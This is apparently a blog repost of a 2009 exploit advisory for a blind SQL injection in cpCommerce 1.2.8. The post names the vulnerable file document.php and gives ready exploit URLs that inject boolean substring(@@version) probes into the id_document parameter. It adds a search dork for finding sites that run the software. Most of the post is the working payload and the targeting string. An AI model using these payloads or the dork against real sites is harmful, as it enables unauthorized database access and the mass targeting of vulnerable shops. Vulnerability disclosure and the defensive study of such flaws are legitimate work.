Home vulnerabilities cpCommerce 1.2.8 Blind SQL Injection Vuln

cpCommerce 1.2.8 Blind SQL Injection Vuln

By
Wednesday, April 15, 2009
Read
Add Comment

[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability
Software : cpC0mmerce version 1.2.8
Vendor   : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author   : NoGe


[o] Vulnerable file
document.php


[o] Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by cpCommerce"


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us